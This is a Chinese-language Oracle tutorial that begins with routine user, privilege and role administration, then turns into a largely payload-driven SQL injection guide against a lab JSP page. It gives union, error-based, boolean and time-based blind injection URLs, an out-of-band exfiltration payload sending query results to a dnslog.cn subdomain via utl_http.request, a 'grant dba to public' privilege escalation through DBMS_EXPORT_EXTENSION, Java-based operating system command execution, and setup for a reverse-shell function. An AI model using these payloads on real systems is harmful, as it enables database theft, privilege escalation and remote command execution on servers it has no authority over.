系统权限授权命令: 系统权限只能由DBA用户授出:sys, system(最开始只能是这两个用户) 授权命令:SQL> grant connect, resource, dba to 用户名1 [,用户名2]…; 注:普通用户通过授权可以具有与system相同的用户权限,但永远不能达到与sys用户相同的权限,system用户的权限也可以被回收。 例: SQL> connectsystem/manager SQL> Create user user50 identified by user50; SQL> grant connect, resource to user50; 查询用户拥有哪里权限: SQL> select from dba_role_privs; SQL> select from dba_sys_privs; SQL> select * from role_sys_privs; 查自己拥有哪些系统权限 SQL> select * from session_privs; 删除用户 SQL> drop user 用户名 cascade; //加上cascade则将用户连同其创建的东西全部删除 系统权限传递:增加WITH ADMIN OPTION选项,则得到的权限可以传递。 SQL> grant connect, resorce to user50 with admin option; //可以传递所获权限。 系统权限回收:系统权限只能由DBA用户回收 SQL> Revoke connect, resource from user50; 说明: 1)如果使用WITH ADMIN OPTION为某个用户授予系统权限,那么对于被这个用户授予相同权限的所有用户来说,取消该用户的系统权限并不会级联取消这些用户的相同权限。 2)系统权限无级联,即A授予B权限,B授予C权限,如果A收回B的权限,C的权限不受影响;系统权限可以跨用户回收,即A可以直接收回C用户的权限。
实体权限管理
—— 实体权限分类 ——
·select, update, insert, alter, index, delete, all //all包括所有权限·execute //执行存储过程权限
user01: SQL> grant select, update, insert on product to user02; SQL> grant all on product to user02; user02: SQL> select * from user01.product; // 此时user02查user_tables,不包括user01.product这个表,但如果查all_tables则可以查到,因为他可以访问。 将表的操作权限授予全体用户: SQL> grant all on product to public; // public表示是所有的用户,这里的all权限不包括drop。 实体权限数据字典 SQL> select owner, table_name from all_tables; // 用户可以查询的表 SQL> select table_name from user_tables; // 用户创建的表 SQL> select grantor, table_schema, table_name, privilege from all_tab_privs; // 获权可以存取的表(被授权的) SQL> select grantee, owner, table_name, privilege from user_tab_privs; // 授出权限的表(授出的权限) DBA用户可以操作全体用户的任意基表(无需授权,包括删除): DBA用户: SQL> Create table stud02.product( id number(10), name varchar2(20)); SQL> drop table stud02.emp; SQL> create table stud02.employee asselect * from scott.emp; 实体权限传递(with grant option): user01: SQL> grant select, update on product to user02 with grant option; // user02得到权限,并可以传递。 实体权限回收: user01: SQL>Revoke select, update on product from user02; //传递的权限将全部丢失。 说明 1)如果取消某个用户的对象权限,那么对于这个用户使用WITH GRANT OPTION授予权限的用户来说,同样还会取消这些用户的相同权限,也就是说取消授权时级联的。
管理角色
建一个角色 sql>create role role1; 授权给角色 sql>grant create any table,create procedure to role1; 授予角色给用户 sql>grant role1 to user1; 查看角色所包含的权限 sql>select * from role_sys_privs; 创建带有口令以角色(在生效带有口令的角色时必须提供口令) sql>create role role1 identified by password1; 修改角色:是否需要口令 sql>alter role role1 not identified; sql>alter role role1 identified by password1; 设置当前用户要生效的角色 (注:角色的生效是一个什么概念呢?假设用户a有b1,b2,b3三个角色,那么如果b1未生效,则b1所包含的权限对于a来讲是不拥有的,只有角色生效了,角色内的权限才作用于用户,最大可生效角色数由参数MAX_ENABLED_ROLES设定;在用户登录后,oracle将所有直接赋给用户的权限和用户默认角色中的权限赋给用户。) sql>set role role1; //使role1生效 sql>set role role,role2; //使role1,role2生效 sql>set role role1 identified by password1; //使用带有口令的role1生效 sql>set role all; //使用该用户的所有角色生效 sql>set role none; //设置所有角色失效 sql>set role all except role1; //除role1外的该用户的所有其它角色生效。 sql>select * from SESSION_ROLES; //查看当前用户的生效的角色。 修改指定用户,设置其默认角色 sql>alter user user1 default role role1; sql>alter user user1 default role all except role1; 删除角色 sql>drop role role1; 角色删除后,原来拥用该角色的用户就不再拥有该角色了,相应的权限也就没有了。 说明: 1)无法使用WITH GRANT OPTION为角色授予对象权限 2)可以使用WITH ADMIN OPTION 为角色授予系统权限,取消时不是级联
DECLARE <declarations section> BEGIN <executable command(s)> EXCEPTION <exception handing> END;
SQL注入需注意的规则
1.Oracle使用查询语言获取需要跟上表名,这一点和Access类似,没有表的情况下可以使用dual表,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录。2.Oracle的数据库类型是强匹配,所以在Oracle进行类似Union查询数据时必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用NULL代替某些无法快速猜测出的数据类型位置,这一点和SQLServer类似。3.Oracle和mysql不一样,分页中没有limit,而是使用三层查询嵌套的方式实现分页 例如: SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >=04.Oracle的单行注释符号是--,多行注释符号/**/。5.Oracle 数据库包含了几个系统表,这几个系统表里存储了系统数据库的表名和列名,如user_tab_columns,all_tab_columns,all_tables,user_tables 系统表就存储了用户的所有的表、列名,其中table_name 表示的是系统里的表名,column_name 里的是系统里存在的列名。6.Oracle使用||拼接字符串(在URL中使用编码%7c表示),concat()函数也可以实现两个字符串的拼接
实验环境
·操作系统:Windows Server 2008R2·数据库:Microsoft SQL Server 2008R2·Web服务器:Tomcat 7.0·脚本语言:jsp·源代码:index.jsp· 本地域名配置::8080
http://:8080/oracle/?id=-1 union select null,null,null from dual --+
http://:8080/oracle/?id=-1 union select 1,'2','3' from dual --+
获取数据库基本信息
获取数据库版本 http://:8080/oracle/?id=-1 union select 1,(select banner from sys.v_$version where rownum=1 ),'3' from dual --+
获取数据库的实例名(SYS用户才可查询) http://:8080/oracle/?id=-1 union select 1,(select instance_name from v_$instance),'3' from dual --+
获取用户名
Oracle没有数据库名的概念,所谓数据库名,即数据表的拥有者,也就是用户名。
获取第一个用户名 http://:8080/oracle/?id=-1 union select 1,(select username from all_users where rownum=1),'3' from dual --+
获取第二个用户名 http://:8080/oracle/?id=-1 union select 1,(select username from all_users where rownum=1 and username<>'SYS'),'3' from dual --+
获取当前用户名 http://:8080/oracle/?id=-1 union select 1,(SELECT user FROM dual),'3' from dual --+
获取表名
获取TEST用户的第一张表 http://:8080/oracle/?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST'),'3' from dual --+
获取TEST用户的第二张表 http://:8080/oracle/?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST' and table_name<>'NEWS'),'3' from dual --+
获取字段名
获取TEST用户的USERS表的第一个列名 http://:8080/oracle/?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),'3' from dual --+
获取TEST用户的USERS表的第二个列名 http://:8080/oracle/?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1 and column_name<>'ID'),'3' from dual --+
获取数据
http://:8080/oracle/?id=-1 union select 1,(select concat(concat(username,'~~'),password) from users where rownum=1),null from dual --+
获取用户名 http://:8080/oracle/?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select user from dual)%7c%7c'~') --+
获取表名 http://:8080/oracle/?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') --+
获取字段名 http://:8080/oracle/?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') --+
获取数据 http://:8080/oracle/?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') --+
ctxsys.drithsx.sn()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select user from dual)%7c%7c'~') --+
获取表名 http://:8080/oracle/?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') --+
获取字段名 http://:8080/oracle/?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') --+
获取数据 http://:8080/oracle/?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') --+
dbms_xdb_version.checkin()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+
获取表名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+
获取字段名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+
获取数据 http://:8080/oracle/?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
dbms_xdb_version.makeversioned()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+
获取表名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+
获取字段名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+
获取数据 http://:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
dbms_xdb_version.uncheckout()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+
获取表名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+
获取字段名 http://:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+
获取数据 http://:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
dbms_utility.sqlid_to_sqlhash()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+
获取表名 http://:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+
获取字段名 http://:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+
获取数据 http://:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
ordsys.ord_dicom.getmappingxpath()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+
获取表名 http://:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+
获取字段名 http://:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+
获取数据 http://:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
XMLType()函数报错注入
获取用户名 http://:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null --+
获取表名 http://:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7cchr(62))) from dual) is not null --+
获取字段名 http://:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7cchr(62))) from dual) is not null --+
获取数据 http://:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select username from test.users where rownum=1)%7c%7cchr(62))) from dual) is not null --+
布尔型盲注
decode()函数布尔盲注
decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3。
当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多。
使用方法:
比较大小
select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值
判断是否是TEST用户 http://:8080/oracle/?id=1 and 1=(select decode(user,'TEST',1,0) from dual) --+
也可利用substr()函数进行逐一猜解 http://:8080/oracle/?id=1 and 1=(select decode(substr((select table_name from all_tables where rownum=1 and owner='TEST'),1,1),'T',1,0) from dual) --+
猜解表名
http://:8080/oracle/?id=1 and 1=(select decode(substr((select table_name from all_tables where rownum=1 and owner='TEST'),1,1),'N',1,0) from dual) --+
猜解字段名
http://:8080/oracle/?id=1 and 1=(select decode(substr((select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),1,1),'I',1,0) from dual) --+
猜解数据
http://:8080/oracle/?id=1 and 1=(select decode(substr((select username from test.users where rownum=1),1,1),'a',1,0) from dual) --+
instr()函数布尔盲注
instr函数的使用,从一个字符串中查找指定子串的位置。例如:
select instr('abcdef123de','de') position from dual;
从1开始算 de排第四所以返回4
布尔盲注中的应用
http://:8080/oracle/?id=1 and (instr((select user from dual),'S'))=1 --+ http://:8080/oracle/?id=1 and (instr((select user from dual),'SY'))=1 --+ http://:8080/oracle/?id=1 and (instr((select user from dual),'SYS'))=1 --+
payload构造如上。
substr()函数布尔盲注
获取数据长度
http://:8080/oracle/?id=1 and (select length(user) from dual)=3 --+
猜解ASCII码
http://:8080/oracle/?id=1 and (select ascii(substr(user,1,1))from dual)>65 --+
oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from all_objects),对数据库中大量数据进行查询或其他处理的操作,这样的操作会耗费较多的时间,然后通过这个方式来获取数据。这种方式也适用于其他数据库。
http://:8080/oracle/?id=1 and 1=(dbms_pipe.receive_message('RDS',5)) --+
来自官网的DBMS_PIPE.RECEIVE_MESSAGE语法:
DBMS_PIPE.RECEIVE_MESSAGE ( pipename IN VARCHAR2, timeout IN INTEGER DEFAULT maxwait) RETURN INTEGER;
具体payload构造:
猜解当前用户
http://:8080/oracle/?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+
猜解表名
http://:8080/oracle/?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(table_name as varchar(4000)),chr(32)) from all_tables where rownum=1 and owner='TEST'),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+
猜解字段
http://:8080/oracle/?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(column_name as varchar(4000)),chr(32)) from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+
猜解数据
http://:8080/oracle/?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(username as varchar(4000)),chr(32)) from test.users where rownum=1),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+
decode()函数时间盲注
(select count(*) from all_objects)会花费更多时间去查询所有数据库的条目。不过在使用的过程中有很多不尽如人意的地方,有时候加载快有时加载慢。
时间盲注的应用
http://:8080/oracle/?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual)
payload构造如上。
decode()与dbms_pipe.receive_message()嵌套时间盲注
时间盲注的应用
http://:8080/oracle/?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS', 5),0) from dual)
http://:8080/oracle/?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --+
若页面返回正常,这说明支持utl_http.request
构造payload
获取用户名 http://:8080/oracle/?id=1 and utl_http.request('http://'%7c%7c(select user from dual)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+
获取表名 http://:8080/oracle/?id=1 and utl_http.request('http://'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+
获取列名 http://:8080/oracle/?id=1 and utl_http.request('http://'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+
获取数据 http://:8080/oracle/?id=1 and utl_http.request('http://'%7c%7c(select username from test.users where rownum=1)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+
·影响版本:Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE(Fixed in CPU July 2006)·权限:None·详情:这个软件包有许多易受PL/SQL注入攻击的函数。这些函数由SYS拥有,作为SYS执行并且可由PUBLIC执行。因此,如果SQL注入处于上述任何未修补的Oracle数据库版本中,那么攻击者可以调用该函数并直接执行SYS查询。
提升权限
该请求将导致查询'GRANT DBA TO PUBLIC'以SYS身份执行。因为这个函数允许PL / SQL缺陷(PL / SQL注入)。一旦这个请求成功执行,PUBLIC获取DBA角色,从而提升当前user的特权
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT'.PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual
使用Java执行
创建Java库
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT'.PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named 'LinxUtil' as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str='';while ((stemp = myReader.readLine()) != null) str +=stemp+'\n';myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str='';while ((stemp = myReader.readLine()) != null) str +=stemp+'\n';myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT'.PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual
赋予函数执行权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT'.PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
执行系统命令
select sys.LinxRunCMD('/bin/bash -c /usr/bin/whoami') from dual
dbms_xmlquery.newcontext()
·影响版本:Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE(Fixed in CPU July 2006)·必须在DBMS_PORT_EXTENSION存在漏洞情况下,否则赋予权限时无法成功s
创建Java库
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named 'LinxUtil' as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str='';while ((stemp = myReader.readLine()) != null) str +=stemp+'\n';myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select * from all_objects where object_name like'%LINX%'or object_name like'%Linx%'
创建函数
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
判断是否创建成功
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
也可通过查看all_objects内部改变判断
select * from all_objects where object_name like'%LINX%'or object_name like'%Linx%'
若想删除创建的函数,通过以下命令删除
dropfunction LinxRunCMD
执行命令
select LinxRunCMD('id') from dual
dbms_java_test.funcall()
·影响版本:10g R2, 11g R1, 11g R2·权限:Java Permissions
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','pwd > /tmp/pwd.txt') from dual;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT' .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
赋予函数执行权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT' .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual